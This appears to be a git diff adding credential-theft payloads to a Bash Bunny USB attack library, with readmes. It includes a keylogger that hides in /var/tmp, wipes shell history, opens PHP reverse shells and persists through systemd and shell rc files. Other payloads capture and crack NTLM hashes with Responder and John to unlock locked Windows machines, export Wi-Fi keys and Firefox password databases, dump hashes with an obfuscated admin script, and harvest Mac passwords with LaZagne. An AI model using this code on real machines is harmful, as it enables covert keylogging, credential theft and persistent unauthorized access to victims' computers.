echo -n "Would you like to transfer more files? [Y/N]: "
read ch
if [ "$ch" = y ] || [ "$ch" = Y ];
then
transfer
elif [ "$ch" = N ] || [ "$ch" = n ];
then
echo -e "\033[1;34m[INFO]: Terminating...\033[0m"
break
else
echo -e "\033[1;31m[ERROR]: Invalid Choice \"$ch\".\033[0m"
fi
done
}
transfer
conti

BIN
payloads/library/credentials/BunnyLogger2.0/requirements/nc Normal file
View File

Binary file not shown.

28
payloads/library/credentials/BunnyLogger2.0/requirements/payload.sh Normal file
View File

@ -0,0 +1,28 @@
#!/bin/bash
unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
mkdir -p /var/tmp/.system/logs
lol=$(lsblk | grep 1.8G)
disk=$(echo $lol | awk '{print $1}')
mntt=$(lsblk | grep $disk | awk '{print $7}')
cp -r $mntt/tools/xinput /var/tmp/.system/
cp -r $mntt/payloads/library/bunnyLogger2/clctrl /var/tmp/.system/
cp -r $mntt/payloads/library/bunnyLogger2/nc /var/tmp/.system/
chmod +x /var/tmp/.system/nc
echo -e "name=\$(date +\"%y-%m-%d-%T\")\n/var/tmp/.system/./xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test > /var/tmp/.system/logs/\$name.log &\n/var/tmp/.system/./xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test" > /var/tmp/.system/sys
chmod +x /var/tmp/.system/sys
chmod +x /var/tmp/.system/clctrl
chmod +x /var/tmp/.system/xinput
echo -e "while :\ndo\n\tping -c 5 127.0.0.1\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"127.0.0.1\",4444);exec("\"/var/tmp/.system/sys -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone &\nwhile :\ndo\n\tping -c 5 127.0.0.1\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"127.0.0.1\",5555);exec("\"/var/tmp/.system/./clctrl "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus
chmod +x /var/tmp/.system/systemBus
mkdir -p ~/.config/systemd/user
echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service
echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot
chmod +x /var/tmp/.system/reboot
echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/reboot.service
systemctl --user daemon-reload
systemctl --user enable --now systemBUS.service
systemctl --user start --now systemBUS.service
systemctl --user enable --now reboot.service
systemctl --user start --now reboot.service
echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.bashrc\nfi" > ~/tmmmp
chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit

BIN
payloads/library/credentials/BunnyLogger2.0/requirements/xinput Normal file
View File

Binary file not shown.

4
payloads/library/credentials/BunnyLogger2.0/uninstall.sh Normal file
View File

@ -0,0 +1,4 @@
#!/bin/bash
loc=$HOME/.config/bunnyLogger
rm -rf $loc
sudo rm /usr/local/bin/bunnyLoggerMgr

111
payloads/library/credentials/BunnyPicker/payload.txt Normal file
View File

@ -0,0 +1,111 @@
#!/bin/bash
#
#Author: rf_bandit
#Version: Version 1.0
#Credit: Hak5Darren, Mubix, catatonic, mame82
#Firmware: 1.7
#Date: May 2023
#
# Options
RESPONDER_OPTIONS="-w -r -d -P"
LOOTDIR=/root/udisk/loot/bunnypicker
WORDFILE= <PATH TO DICTIONARY HERE>
#eg /tools/john/password.lst
# or install via tools folding in arming mode (/tools/<wordlist>)
PAYLOAD_DIR=/root/udisk/payloads/$SWITCH_POSITION
# Check for responder and john
REQUIRETOOL responder
REQUIRETOOL john
# Setup Attack
LED SETUP
# Use RNDIS for Windows. Mac/*nix use ECM_ETHERNET
ATTACKMODE HID RNDIS_ETHERNET
#ATTACKMODE ECM_ETHERNET
# Set convenience variables
GET TARGET_HOSTNAME
GET TARGET_IP
# Setup named logs in loot directory
mkdir -p $LOOTDIR
HOST=${TARGET_HOSTNAME}
# If hostname is blank set it to "noname"
[[ -z "$HOST" ]] && HOST="noname"
COUNT=$(ls -lad $LOOTDIR/$HOST* | wc -l)
COUNT=$((COUNT+1))
mkdir -p $LOOTDIR/$HOST-$COUNT
# As a backup also copy logs to a loot directory in /root/loot/
mkdir -p /root/loot/bunnypicker/$HOST-$COUNT
# Check target IP address. If unset, blink RED and end.
if [ -z "${TARGET_IP}" ]; then
LED FAIL2
exit 1
fi
# Set LED yellow, run attack
LED ATTACK
cd /tools/responder
# Clean logs directory
rm logs/*
# Run Responder with specified options
python Responder.py -I usb0 $RESPONDER_OPTIONS &
# Wait until NTLM log is found
until [ -f logs/*NTLM* ]
do
# Ima just loop here until NTLM logs are found
sleep 1
done
# copy logs to loot directory
cp logs/* /root/loot/bunnypicker/$HOST-$COUNT
cp logs/* $LOOTDIR/$HOST-$COUNT
# Sync USB disk filesystem
sync
#kill responder
killall python
killall python
killall python
#Cracking begins!
cd /tools/john
LED STAGE1
#This should be a small wordlist as we are looking for lowhanging fuit. We can do 100K passwords in ~1 second.
#We could go CUCMBER PLAID here but its probably not needed
./john --wordlist=$WORDFILE --pot=/root/loot/bunnypicker/$HOST-$COUNT/john.pot /root/loot/bunnypicker/$HOST-$COUNT/*.txt
# Check john.pot If empty blink RED and end. Move to offline attack.
if [[ -z $(grep '[^[:space:]]' /root/loot/bunnypicker/$HOST-$COUNT/john.pot) ]]; then
LED FAIL3
exit 1
fi
#This will copy our cracked password to the loot folder for future use.
LED STAGE2
awk NR==1 /root/loot/bunnypicker/$HOST-$COUNT/john.pot | cut -d: -f2 > $LOOTDIR/$HOST-$COUNT/$HOST-$COUNT-pass.txt
echo -n "STRING " > $PAYLOAD_DIR/pass.txt
cat $LOOTDIR/$HOST-$COUNT/$HOST-$COUNT-pass.txt >> $PAYLOAD_DIR/pass.txt
#This should unlock the machine with our cracked password.
#$PAYLOAD_DIR would not work with QUACK
QUACK ESC
DELAY 100
QUACK $SWITCH_POSITION/pass.txt
QUACK ENTER
rm $PAYLOAD_DIR/pass.txt
LED CLEANUP
sync
# When the light turns green its a hacked machine.
LED FINISH

117
payloads/library/credentials/BunnyPicker/readme.md Normal file
View File

@ -0,0 +1,117 @@
# Bunnypicker (Win10 Lockpicker for Bash Bunny)
.______ __ __ .__ __. .__ __. ____ ____ .______ __ ______ __ ___ _______ .______
| _ \ | | | | | \ | | | \ | | \ \ / / | _ \ | | / || |/ / | ____|| _ \
| |_) | | | | | | \| | | \| | \ \/ / | |_) | | | | ,----'| ' / | |__ | |_) |
| _ < | | | | | . ` | | . ` | \_ _/ | ___/ | | | | | < | __| | /
| |_) | | `--' | | |\ | | |\ | | | | | | | | `----.| . \ | |____ | |\ \----.
|______/ \______/ |__| \__| |__| \__| |__| | _| |__| \______||__|\__\ |_______|| _| `._____|
,
/| __
/ | ,-~ /
Y :| // /
| jj /( .^
>-"~"-v"
/ Y
jo o |
( ~T~ j
>._-' _./
/ "~" |
Y _, |
/| ;-"~ _ l
/ l/ ,-"~ \
\//\/ .- \
Y / Y -Row
l I !
]\ _\ /"\
(" ~----( ~ Y. )
~~~~~~~~~~~~~~~~~~~~~~~~~~
Author: rf_bandit
Version: Version 1.0
Credit: Hak5Darren, Mubix, catatonic, mame82
Firmware: 1.7
Target: Windows 10/11
Date: May 2023
## Description
This is based on Quickcreds, Jackalope, and Win10Lockpicker (for the OG P4wnP1)
Snags credentials from locked machines
Implements a responder attack. Saves creds to the loot folder on the USB Disk
Looks for *NTLM* log files
Cracks hash with John the Ripper. Best with a smaller dictionary.
Saves cracked hash to loot folder
Quacks password and unlocks machine
On a current (May 2023) Win10/Win11 machine, it shouldn't take more about 35 seconds to get a hash.
If attack stage lasts longer than ~1, try disconnecting/reconnecting from wifi/network.
We can run through 100K simple passwords in 1 second.
Best time I got was 29.60 seconds from Bash Bunny boot to machine unlock.
## Configuration
.
Configured for Windows. Not tested on Mac/*nix
The path to the wordfile needs to be configured, eg /tools/<your-file-here> or /tools/john/password.lst (included) . The most straightforwrd way to get a large wordlist is to put it in the /tools folder in arming mode. A future version could check for a wordlist in /tools and if not found fallback to the included /tools/john/password.lst.
## Requirements
Responder must be in /tools/responder/
(Can be otained from https://forums.hak5.org/topic/40971-info-tools/)
JtR must be in /tools/john
Requires initial setup (below)
## Initial Setup
Install responder from https://forums.hak5.org/topic/40971-info-tools/
Replace /etc/apt/sources.list with:
deb http://archive.debian.org/debian/ jessie main non-free contrib
deb-src http://archive.debian.org/debian/ jessie main non-free contrib
deb http://archive.debian.org/debian-security/ jessie/updates main non-free contrib
deb-src http://archive.debian.org/debian-security/ jessie/updates main non-free contrib
apt update (DO NOT RUN apt upgrade as it will break RNDIS_ETHERNET. Not entirely clear why.)
The john package included can't handle NTLM hashes so we will make our own.
Install gcc and git if you don't have them.
apt-get install gcc
apt-get install git
git config --global http.sslverify "false" (this is insecure but I'm not worried)
git clone https://github.com/openwall/john
cd john
./configure && make
mv run /tools/john
cd ..
rm -r john (not required but a space saving measure)
## STATUS
| Status | Description |
| ------------------- | ---------------------------------------- |
| LED SETUP | Starting |
| LED ATTACK | Grabbing creds |
| LED STAGE1 | Running JtR |
| LED STAGE2 | Unlocking |
| LED CLEANUP | Sync to disk |
| LED FINISH | Trap is clean |
| FAIL1 | Responder not found at /tools/responder |
| FAIL2 | Target did not aquire IP address |
| FAIL3 | Hash not cracked - move to offline attack|
## ADDITIONAL NOTES
For debugging its better to use LED B for STAGE1 and LED W for STAGE2 because its easier to pinpoint failure.
A future version could check for a wordlist in /tools and if not found fallback to /tools/john/password.lst.
Might also steal catatonic's use of the switch (very cool) to initiate password quacking to make the payload more versatile on both locked
and unlocked machines.
This was fun to make. Thanks to everyone who put in all the hard work before me.

6
payloads/library/credentials/FireSnatcher/FireSnatcher.bat Normal file
View File

@ -0,0 +1,6 @@
mkdir %~dp0\loot\%COMPUTERNAME%
cd /D %~dp0\loot\%COMPUTERNAME% && netsh wlan export profile key=clear
C: cd \D %appdata%\mozilla\firefox\profiles\
cd %appdata%\mozilla\firefox\profiles\*.default-release\
copy key4.db %~dp0\loot\%COMPUTERNAME%
copy logins.json %~dp0\loot\%COMPUTERNAME%

45
payloads/library/credentials/FireSnatcher/README.md Normal file
View File

@ -0,0 +1,45 @@
# Title: FireSnatcher
# Description: Copies Wifi Keys, and Firefox Password Databases
# Author: KarrotKak3
# Props: saintcrossbow & 0i41E
# Version: 1.0.2.0 (Work in Progress)
# Category: Credentials
# Target: Windows (Logged in)
# Attackmodes: HID, Storage
# Full Description
# ----------------
# Attacks an Unlocked Windows Machine
# Payload targets:
# - All WiFi creds
# - Firefox Saved Password Database
#
# PAYLOAD RUNS START TO FINISH IN ABOUT 20 SEC
# Delays to Allow Powershell Time to Open and to Give Attack time to Run
# HOW TO USE PASSWORD DB: COPY KEY4.DB AND LOGINS.JSON TO YOUR COMPUTER AT
# %APPDATA%\MOZILLA\FIREFOX\PROFILES\*.DEFAULT-RELEASE
# Open Firefox and find loot in Settings-> Privacy & Security -> Saved Logins
# KNOWN ISSUES
# ---------------
# Loot is saved in Payloads/switch#/loot
# Files
# -----
# - payload.txt: Starts the attack. All configuration contained in this file.
# - FireSnatcher.bat: Worker that grabs Creds
# Setup
# -----
# - Place the payload.txt and FireSnatcher.bat in Payload folder
# - If you are using a SD card, copy FireSnatcher.bat under /payloads/switchn/ (where n is the switch you are running)
# - Good idea to have the Bunny ready to copy to either the device or SD for maximum versatility
**LED meanings**
- Magenta: Initial setup about 1 3 seconds
- Single yellow blink: Attack in progress
- Green rapid flash, then solid, then off: Attack complete

78
payloads/library/credentials/FireSnatcher/payload.txt Normal file
View File

@ -0,0 +1,78 @@
# Title: FireSnatcher
# Description: Copies Wifi Keys, and Firefox Password Databases
# Author: KarrotKak3
# Props: saintcrossbow & 0i41E
# Version: 1.0.2.0 (Work in Progress)
# Category: Credentials
# Target: Windows (Logged in)
# Attackmodes: HID, Storage
# Full Description
# ----------------
# Attacks an Unlocked Windows Machine
# Payload targets:
# - All WiFi creds
# - Firefox Saved Password Database
#
# PAYLOAD RUNS START TO FINISH IN ABOUT 20 SEC
# Delays to Allow Powershell Time to Open and to Give Attack time to Run
# HOW TO USE PASSWORD DB: COPY KEY4.DB AND LOGINS.JSON TO YOUR COMPUTER AT
# %APPDATA%\MOZILLA\FIREFOX\PROFILES\*.DEFAULT-RELEASE
# Open Firefox and find loot in Settings-> Privacy & Security -> Saved Logins
# KNOWN ISSUES
# ---------------
# Loot is saved in Payloads/switch#/loot
# Files
# -----
# - payload.txt: Starts the attack. All configuration contained in this file.
# - FireSnatcher.bat: Worker that grabs Creds
# Setup
# -----
# - Place the payload.txt and FireSnatcher.bat in Payload folder
# - If you are using a SD card, copy FireSnatcher.bat under /payloads/switchn/ (where n is the switch you are running)
# - Good idea to have the Bunny ready to copy to either the device or SD for maximum versatility
# LEDs
# ----
# Magenta: Initial setup about 1 3 seconds
# Single yellow blink: Attack in progress
# Green rapid flash, then solid, then off: Attack complete Bash Bunny may be removed
# Options
# -------
# Name of Bash Bunny volume that appears to Windows (BashBunny is default)
BB_NAME="BashBunny"
# Setup
# -----
LED SETUP
# Attack
# ------
ATTACKMODE HID STORAGE
Q DELAY 500
LED ATTACK
Q DELAY 100
Q GUI r
Q DELAY 100
Q STRING powershell Start-Process powershell
Q ENTER
Q DELAY 7000
Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\FireSnatcher.bat')"
Q ENTER
Q DELAY 8000
Q STRING EXIT
Q ENTER
sync
LED FINISH
Q DELAY 1500
shutdown now

2
payloads/library/credentials/HashDumpBunny/BunnyDump.bat Normal file
View File

File diff suppressed because one or more lines are too long

20
payloads/library/credentials/HashDumpBunny/README.md Normal file
View File

@ -0,0 +1,20 @@
**Title: HashDumpBunny**
Author: 0i41E
Version: 1.0
**Instruction:**
This payload will run an obfuscated script to dump user hashes. If you don't trust this obfuscated .bat file, you should run it within a save space first - which should be best practice anyways ;-)
#
**!Depending on your Windows version, this might not work as intended!**
#
**Instruction:**
Place BunnyDump.bat in the same payload switch-folder as your payload.txt
#
Plug in BashBunny.
Exfiltrate the out.txt file and try to crack the hashes.
![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/HashDumpBunny/censoredhash.png)

BIN
payloads/library/credentials/HashDumpBunny/censoredhash.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 13 KiB

44
payloads/library/credentials/HashDumpBunny/payload.txt Normal file
View File

@ -0,0 +1,44 @@
#!/bin/bash
#
# Title: HashDumpBunny
# Description: Dump user hashes with this script, which was obfuscated with multiple layers.
# Author: 0i41E
# Version: 1.0
# Category: Credentials
# Attackmodes: HID, Storage
LED SETUP
Q DELAY 500
GET SWITCH_POSITION
DUCKY_LANG de
Q DELAY 500
ATTACKMODE HID STORAGE
#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING
LED STAGE1
#After you have adapted the delays for your target, add "-W hidden"
Q DELAY 1000
RUN WIN "powershell Start-Process powershell -Verb runAs"
Q ENTER
Q DELAY 1000
Q ALT j
Q DELAY 250
Q DELAY 250
Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\BunnyDump.bat')"
Q DELAY 250
Q STRING " ;mv out.txt ((gwmi win32_volume -f 'label=''BashBunny''').Name+'\loot');\$bb = (gwmi win32_volume -f 'l"
Q DELAY 250
Q STRING "abel=''BashBunny''').Name;Start-Sleep 1;New-Item -ItemType file \$bb'DONE';(New-Object -comObject Shell.Application).Nam"
Q DELAY 250
Q STRING "espace(17).ParseName(\$bb).InvokeVerb('Eject');Start-Sleep -s 5;Exit"
Q DELAY 300
Q ENTER
LED FINISH

2
payloads/library/credentials/Jackalope/payload.txt
View File

@ -28,7 +28,7 @@ mkdir -p $LOOTDIR
MSF_DIR=/tools/metasploit-framework
# Save environment informaiton:
# Save environment information:
echo "PAYLOAD_DIR: $PAYLOAD_DIR" >> $LOOTDIR/log.txt
echo "MSF_DIR: $MSF_DIR" >> $LOOTDIR/log.txt
echo "LOOTDIR: $LOOTDIR" >> $LOOTDIR/log.txt

4
payloads/library/credentials/Jackalope/readme.md
View File

@ -26,7 +26,9 @@ Uses ethernet to attempt dictionary attacks against passwords. When the password
To clear a stored password move the switch to switch3 (aka arming mode) after the payload runs and displays GREEN. The status light will change to SPECIAL (cyan) indicating the password has been removed. Positioning the switch to switch1 or switch2 will re-initiate the attack.
## Configuration
No initial configuration is required for bunny firmware v1.6+.
You must have a Metasploit installation up and running in path /tools/metasploit-framework/
Information and instructions for the installation of additional tools to the Bash Bunny can be found [here](https://docs.hak5.org/hc/en-us/articles/360010554133-Installing-and-using-additional-tools).
No further initial configuration is required for Firmware v1.6+.
### Per attack configuration
1. userlist.txt contains usernames to use in attack.

23704
payloads/library/credentials/MacPass/get-pip.py Normal file
View File

File diff suppressed because it is too large Load Diff

238
payloads/library/credentials/MacPass/laZagne.py Normal file
View File

@ -0,0 +1,238 @@
# -*- coding: utf-8 -*-
# !/usr/bin/python
##############################################################################
# #
# By Alessandro ZANNI #
# #
##############################################################################
# Disclaimer: Do Not Use this program for illegal purposes ;)
import argparse
import logging
import sys
import os
import time
# Configuration
from lazagne.config.write_output import write_in_file, StandardOutput
from lazagne.config.manage_modules import get_categories
from lazagne.config.constant import constant
from lazagne.config.run import run_lazagne, create_module_dic
# Object used to manage the output / write functions (cf write_output file)
constant.st = StandardOutput()
modules = create_module_dic()
def output(output_dir=None, txt_format=False, json_format=False, all_format=False):
if output_dir:
if os.path.isdir(output_dir):
constant.folder_name = output_dir
else:
print('[!] Specify a directory, not a file !')
if txt_format:
constant.output = 'txt'
if json_format:
constant.output = 'json'
if all_format:
constant.output = 'all'
if constant.output:
if not os.path.exists(constant.folder_name):
os.makedirs(constant.folder_name)
# constant.file_name_results = 'credentials' # let the choice of the name to the user
if constant.output != 'json':
constant.st.write_header()
def quiet_mode(is_quiet_mode=False):
if is_quiet_mode:
constant.quiet_mode = True
def verbosity(verbose=0):
# Write on the console + debug file
if verbose == 0:
level = logging.CRITICAL
elif verbose == 1:
level = logging.INFO
elif verbose >= 2:
level = logging.DEBUG
formatter = logging.Formatter(fmt='%(message)s')
stream = logging.StreamHandler(sys.stdout)
stream.setFormatter(formatter)
root = logging.getLogger()
root.setLevel(level)
# If other logging are set
for r in root.handlers:
r.setLevel(logging.CRITICAL)
root.addHandler(stream)
def manage_advanced_options(user_password=None, dictionary_attack=None):
if user_password:
constant.user_password = user_password
if dictionary_attack:
constant.dictionary_attack = dictionary_attack
def clean_args(arg):
"""
Remove not necessary values to get only subcategories
"""
for i in ['output', 'write_normal', 'write_json', 'write_all', 'verbose', 'auditType', 'quiet']:
try:
del arg[i]
except Exception:
pass
return arg
def runLaZagne(category_selected='all', subcategories={}, password=None, interactive=False):
"""
This function will be removed, still there for compatibility with other tools
Everything is on the config/run.py file
"""
for pwd_dic in run_lazagne(
category_selected=category_selected,
subcategories=subcategories,
password=password,
interactive=interactive
):
yield pwd_dic
if __name__ == '__main__':
parser = argparse.ArgumentParser(description=constant.st.banner, formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('--version', action='version', version='Version ' + str(constant.CURRENT_VERSION),
help='laZagne version')
# ------------------------------------------- Permanent options ------------------------------------------
# Version and verbosity
PPoptional = argparse.ArgumentParser(
add_help=False,
formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=constant.MAX_HELP_POSITION)
)
PPoptional._optionals.title = 'optional arguments'
PPoptional.add_argument('-i', '--interactive', default=False, action='store_true',
help='will prompt a window to the user')
PPoptional.add_argument('-password', dest='password', action='store',
help='user password used to decrypt the keychain')
PPoptional.add_argument('-attack', dest='attack', action='store_true',
help='500 well known passwords used to check the user hash (could take a while)')
PPoptional.add_argument('-v', dest='verbose', action='count', help='increase verbosity level', default=0)
PPoptional.add_argument('-quiet', dest='quiet', action='store_true',
help='quiet mode: nothing is printed to the output', default=False, )
# Output
PWrite = argparse.ArgumentParser(
add_help=False,
formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=constant.MAX_HELP_POSITION)
)
PWrite._optionals.title = 'Output'
PWrite.add_argument('-oN', dest='write_normal', action='store_true', help='output file in a readable format')
PWrite.add_argument('-oJ', dest='write_json', action='store_true', help='output file in a json format')
PWrite.add_argument('-oA', dest='write_all', action='store_true', help='output file in all format')
PWrite.add_argument('-output', dest='output', action='store', help='destination path to store results (default:.)',
default='.')
# -------------------------------- Add options and suboptions to all modules ------------------------------
all_subparser = []
categories = get_categories()
for c in categories:
categories[c]['parser'] = argparse.ArgumentParser(
add_help=False,
formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=constant.MAX_HELP_POSITION)
)
categories[c]['parser']._optionals.title = categories[c]['help']
# Manage options
categories[c]['subparser'] = []
for module in modules[c]:
m = modules[c][module]
categories[c]['parser'].add_argument(m.options['command'], action=m.options['action'], dest=m.options['dest'],
help=m.options['help'])
# Manage all sub options by modules
if m.suboptions:
tmp = []
for sub in m.suboptions:
tmp_subparser = argparse.ArgumentParser(
add_help=False,
formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=constant.MAX_HELP_POSITION)
)
tmp_subparser._optionals.title = sub['title']
if 'type' in sub:
tmp_subparser.add_argument(sub['command'], type=sub['type'], action=sub['action'],
dest=sub['dest'], help=sub['help'])
else:
tmp_subparser.add_argument(sub['command'], action=sub['action'], dest=sub['dest'],
help=sub['help'])
tmp.append(tmp_subparser)
all_subparser.append(tmp_subparser)
categories[c]['subparser'] += tmp
# ------------------------------------------- Print all -------------------------------------------
parents = [PPoptional] + all_subparser + [PWrite]
dic = {'all': {'parents': parents, 'help': 'Run all modules'}}
for c in categories:
parser_tab = [PPoptional, categories[c]['parser']]
if 'subparser' in categories[c]:
if categories[c]['subparser']:
parser_tab += categories[c]['subparser']
parser_tab += [PWrite]
dic_tmp = {c: {'parents': parser_tab, 'help': 'Run %s module' % c}}
dic = dict(list(dic.items()) + list(dic_tmp.items()))
subparsers = parser.add_subparsers(help='Choose a main command')
for d in dic:
subparsers.add_parser(d, parents=dic[d]['parents'], help=dic[d]['help']).set_defaults(auditType=d)
# ------------------------------------------- Parse arguments -------------------------------------------
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = dict(parser.parse_args()._get_kwargs())
arguments = parser.parse_args()
# Define constant variables
output(
output_dir=args['output'],
txt_format=args['write_normal'],
json_format=args['write_json'],
all_format=args['write_all']
)
verbosity(verbose=args['verbose'])
manage_advanced_options(user_password=args.get('password', None), dictionary_attack=args.get('attack', None))
quiet_mode(is_quiet_mode=args['quiet'])
# Print the title
constant.st.first_title()
start_time = time.time()
category_selected = args['auditType']
subcategories = clean_args(args)
for r in runLaZagne(
category_selected=category_selected,
subcategories=subcategories,
password=args.get('password', None),
interactive=arguments.interactive
):
pass
write_in_file(constant.stdout_result)
constant.st.print_footer(elapsed_time=str(time.time() - start_time))

BIN
payloads/library/credentials/MacPass/lazagne.zip Normal file
View File

Binary file not shown.

44
payloads/library/credentials/MacPass/payload.txt Normal file
View File

@ -0,0 +1,44 @@
#!/bin/bash
#
# Title: Mac Password Grabber
# Author: Overtimedev
# Version: 1.0
#
# Steals Passwords Mac using laZagne.py then stashes them in /root/udisk/loot/MacPass
# s(Replace PASSWORD, with your vicims mac computer password in payload.txt)
#
# Amber..............Executing payload
# Green..............Finished
#
LED G R
ATTACKMODE HID STORAGE
lootdir=loot/MacPass
mkdir -p /root/udisk/$lootdir
QUACK GUI SPACE
QUACK DELAY 1000
QUACK STRING terminal
QUACK ENTER
QUACK DELAY 3000
QUACK STRING cd /Volumes/BashBunny/
QUACK ENTER
QUACK DELAY 1000
QUACK STRING python get-pip.py
QUACK ENTER
QUACK DELAY 3000
QUACK STRING pip install -r requirements.txt
QUACK ENTER
QUACK DELAY 3000
QUACK STRING python laZagne.py all -password PASSWORD -oN -output loot/MacPass
QUACK ENTER
QUACK DELAY 10000
QUACK STRING killall Terminal
QUACK ENTER
# Sync filesystem
sync
# Green LED for finished
LED G

25
payloads/library/credentials/MacPass/readme.md Normal file
View File

@ -0,0 +1,25 @@
# Mac Password Grabber for the BashBunny
* Author: Overtimedev
* Version: Version 1.0
* Target: OSX
## Description
Steals Mac Passwords using laZagne.py then stashes them in /loot/MacPass
1. put get-pip.py, laZagne.py and requirements.txt in the root folder of the bunny
2. unzip lazagne.zip into the root folder of the bunny
3. Replace PASSWORD, with your vicims mac computer password in payload.txt
## STATUS
| LED | Status |
| ------------------ | -------------------------------------------- |
| Amber | Executin Payload |
| Green | Attack Finished |

8
payloads/library/credentials/MacPass/requirements.txt Normal file
View File

@ -0,0 +1,8 @@
psutil; sys_platform == 'linux' or sys_platform == 'linux2'
secretstorage; sys_platform == 'linux' or sys_platform == 'linux2'
pyasn1
enum34; python_version < '3.4' and sys_platform == 'win32'
rsa; sys_platform == 'win32'
https://github.com/AlessandroZ/pypykatz/archive/master.zip; python_version < '3.4' and sys_platform == 'win32'
https://github.com/skelsec/pypykatz/archive/master.zip; python_version > '3.5' and sys_platform == 'win32'
pycryptodome

2
payloads/library/credentials/MiniDumpBunny/MiniBunny.bat Normal file
View File

@ -0,0 +1,2 @@
挦獬
